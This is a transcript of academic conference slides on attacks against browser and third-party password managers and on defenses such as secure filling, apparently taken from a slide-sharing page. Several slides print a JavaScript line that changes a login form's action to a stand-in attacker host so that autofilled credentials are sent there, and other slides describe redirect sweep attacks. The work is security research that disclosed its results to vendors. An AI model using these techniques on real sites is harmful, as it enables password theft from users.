Presentation is loading. Please wait.

Presentation is loading. Please wait.

Password Managers: Attacks and Defenses David SilverSuman JanaDan Boneh Stanford University Eric ChenCollin Jackson Carnegie Mellon University Usenix Security.

Published byDeon Lykes Modified over 9 years ago

Similar presentations

Presentation on theme: "Password Managers: Attacks and Defenses David SilverSuman JanaDan Boneh Stanford University Eric ChenCollin Jackson Carnegie Mellon University Usenix Security."— Presentation transcript:

1 Password Managers: Attacks and Defenses David SilverSuman JanaDan Boneh Stanford University Eric ChenCollin Jackson Carnegie Mellon University Usenix Security 20148/21/14

2 A tool for… 2 Convenience?Security? Goal: Both!

3 Password Manager Workflow 3 Password Manager Save manually entered password Autofill username and password Topic of this talk

4 Manual Autofill 4 Page Load User Interaction

5 Automatic Autofill 5 Page Load Convenient…but hard to make secure User Interaction

6 Should we autofill? 6 Automatic Autofill Corner Cases

7 Should we autofill? The contestants 7 Browser-based: Chrome 34Firefox 29Safari 7.0 IE 11 Android Browser 4.3 Third-party: LastPass 2.0 Norton IdentitySafe 2014 1Password 4.5 KeePass 2.24 Keeper 7.5

8 Should we autofill? Different form action 8 HTTPS Automatic Autofill: At Save:Now: Alternatively, what if action is changed by JavaScript after autofilling? form.action = “http://evil.com” Alternatively, what if action is changed by JavaScript after autofilling? form.action = “http://evil.com”

9 Should we autofill? Different form action 9 HTTPS Alternatively, what if action is changed by JavaScript after autofilling? form.action = “http://evil.com” Alternatively, what if action is changed by JavaScript after autofilling? form.action = “http://evil.com” Automatic Autofill: At Save: Now:

10 Should we autofill? Click through HTTPS warning 10 Automatic Autofill:

11 Should we autofill? iFrame not same-origin with parent 11 Automatic Autofill:

12 12 Sweep Attacks Stealing multiple passwords without user interaction

13 Threat Model: Coffee-shop Attacker 13 1.2. Save Password for b.com Goal: Trick password manager into revealing b.com’s password Browse a.com

14 Obligatory Food Example 14

15 Redirect Sweep Attack on HTTP Login Page 15 GET papajohns.com REDIRECT att.com GET att.com att.com GET papajohns.com papajohns.com + attacker JS automatic autofill att.com password stolen!

16 16 Redirect Sweep Attack Demo (Fast) http://youtu.be/n0xIiWl0pZo

17 17 Redirect Sweep Attack Demo (Slow) http://youtu.be/qiiSuIE79No

18 HTTP Login Pages 18 Alexa Top 500* Login Pages408— Load Login Page over HTTP (submit over HTTP or HTTPS) 19447% *as of October 2013 HTTP pages trivially vulnerable to code injection by coffee shop attacker att.com vulnerable because it loads login page over HTTP (even though it submits over HTTPS)

19 Attacking HTTPS XSS Injection Active Mixed Content Trick user into clicking through HTTPS warning 19

20 Other sweep attacks (see paper) 20 iFrame sweep attack Window sweep attack

21 Sweep Attacks Vulnerability Automatic Manual 21 Vulnerable Not Vulnerable

22 Defending against sweep attacks 22

23 Defense #1: Manual Autofill as secure as manual entry Fill-and-Submit Still just one click for the user 23 Page Load Less convenient?

24 Can we do better? Security 24

25 Defense #2: Secure Filling more secure than manual entry Don’t let JavaScript read autofilled passwords Let form submit only if action matches action when password was saved (Site must submit form using HTTPS) Prototype implementation in Chromium (~50 lines) 25

26 Security More secure than manual entry 26

27 AJAX 10 sites out of Alexa Top 50* use AJAX to submit password forms Workarounds Submit form in iFrame Create browser SendPwd API 27 *as of October 2013

28 Disclosure Disclosed results to password vendors Warning when autofilling HTTPS passwords on HTTP pages Don't automatically autofill passwords in iFrames not same-origin with parent 28

29 Conclusions Automatic autofill has lots of corner cases Sweep Attacks: steal passwords without any user interaction Defenses Require user interaction before filling passwords Secure Filling Just as convenient for user but much more secure 29

30 Questions? 30

31 HTTP Login Pages 31 Alexa Top 500* Login Pages408— Load over HTTP, submit over HTTPS7117% Load and submit over HTTP12330% Load over HTTP19447% *as of October 2013

32 What about strength checkers? Only needed on registration forms Use JavaScript to read password field Don’t conflict with secure filling - password managers shouldn’t be filling existing passwords on registration forms 32

Download ppt "Password Managers: Attacks and Defenses David SilverSuman JanaDan Boneh Stanford University Eric ChenCollin Jackson Carnegie Mellon University Usenix Security."

Similar presentations

Minnesota Registration and Certification (MR & C) History of Electronic systems January 1, 2010.

Minnesota Registration and Certification (MR & C) History of Electronic systems January 1, 2010.
ForceHTTPS: Protecting High-Security Web Sites from Network Attacks Collin Jackson and Adam Barth.

ForceHTTPS: Protecting High-Security Web Sites from Network Attacks Collin Jackson and Adam Barth.
HI-TEC 2011 SQL Injection. Client’s Browser HTTP or HTTPS Web Server Apache or IIS HTML Forms CGI Scripts Database SQL Server or Oracle or MySQL ODBC.

HI-TEC 2011 SQL Injection. Client’s Browser HTTP or HTTPS Web Server Apache or IIS HTML Forms CGI Scripts Database SQL Server or Oracle or MySQL ODBC.
Protecting Browsers from Cross-Origin CSS Attacks Lin-Shung Huang, Zack Weinberg Carnegie Mellon University Chris Evans Google Collin Jackson Carnegie.

Protecting Browsers from Cross-Origin CSS Attacks Lin-Shung Huang, Zack Weinberg Carnegie Mellon University Chris Evans Google Collin Jackson Carnegie.
Chrome Extentions Vulnerabilities. Introduction Google Chrome Browser Chrome OS Platform Chrome Web Store Applications Open Source Platform.

Chrome Extentions Vulnerabilities. Introduction Google Chrome Browser Chrome OS Platform Chrome Web Store Applications Open Source Platform.
WEB BROWSER SECURITY By Robert Sellers Brian Bauer.

WEB BROWSER SECURITY By Robert Sellers Brian Bauer.
Using LastPass CONFIDENTIAL.  Great password management is impossible w/o a great tool  Auto-fill (hands-free login) will save you approximately 1 hour.

Using LastPass CONFIDENTIAL.  Great password management is impossible w/o a great tool  Auto-fill (hands-free login) will save you approximately 1 hour.
17 th ACM CCS (October, 2010).  Introduction  Threat Model  Cross-Origin CSS Attacks  Example Attacks  Defenses  Experiment  Related Work 2 A Presentation.

17 th ACM CCS (October, 2010).  Introduction  Threat Model  Cross-Origin CSS Attacks  Example Attacks  Defenses  Experiment  Related Work 2 A Presentation.
Copyright © 2004 - The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation.

Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation.
All Your Browser-saved Passwords Could Belong to Us - A Security Analysis and a Cloud-based New Design By Rui Zhao, Chuan Yue ACM Conference on Data and.

All Your Browser-saved Passwords Could Belong to Us - A Security Analysis and a Cloud-based New Design By Rui Zhao, Chuan Yue ACM Conference on Data and.
Password Managers: Attacks and Defenses David Silver, Suman Jana, Dan Boneh, Stanford University Eric Chen, Collin Jackson, Carnegie Mellon University.

Password Managers: Attacks and Defenses David Silver, Suman Jana, Dan Boneh, Stanford University Eric Chen, Collin Jackson, Carnegie Mellon University.
Web 2.0 security Kushal Karanjkar Under guidance of Prof. Richard Sinn.

Web 2.0 security Kushal Karanjkar Under guidance of Prof. Richard Sinn.
Warning Ahead: Security Storms are Brewing in Your JavaScript Maty Siman.

Warning Ahead: Security Storms are Brewing in Your JavaScript Maty Siman.
The OWASP Foundation Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under.

The OWASP Foundation Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under.
Lab 3 Cookie Stealing using XSS Kara James, Chelsea Collins, Trevor Norwood, David Johnson.

Lab 3 Cookie Stealing using XSS Kara James, Chelsea Collins, Trevor Norwood, David Johnson.
By Swapnesh Chaubal Rohit Bhat. BEAST : Browser Exploit Against SSL/TLS Julianno Rizzo and Thai Duong demonstrated this attack.

By Swapnesh Chaubal Rohit Bhat. BEAST : Browser Exploit Against SSL/TLS Julianno Rizzo and Thai Duong demonstrated this attack.
Password Management Programs By SIR Phil Goff, Branch 116 Area 2 Computers and Technology April 18, 2013 1.

Password Management Programs By SIR Phil Goff, Branch 116 Area 2 Computers and Technology April 18,
PASSWORD MANAGEMENT MADE EASY A Project Play Date - September 26, 2008 Beth Carpenter, Library Services Manager, Outagamie Waupaca Library System.

PASSWORD MANAGEMENT MADE EASY A Project Play Date - September 26, 2008 Beth Carpenter, Library Services Manager, Outagamie Waupaca Library System.
Towards a Formal Foundation of Web Security devdatta akhawe / adam barth / peifung eric lam john mitchell / dawn song.

Towards a Formal Foundation of Web Security devdatta akhawe / adam barth / peifung eric lam john mitchell / dawn song.
Introduction to InfoSec – Recitation 7 Nir Krakowski (nirkrako at post.tau.ac.il) Itamar Gilad (itamargi at post.tau.ac.il)

Introduction to InfoSec – Recitation 7 Nir Krakowski (nirkrako at post.tau.ac.il) Itamar Gilad (itamargi at post.tau.ac.il)

Similar presentations

Ads by Google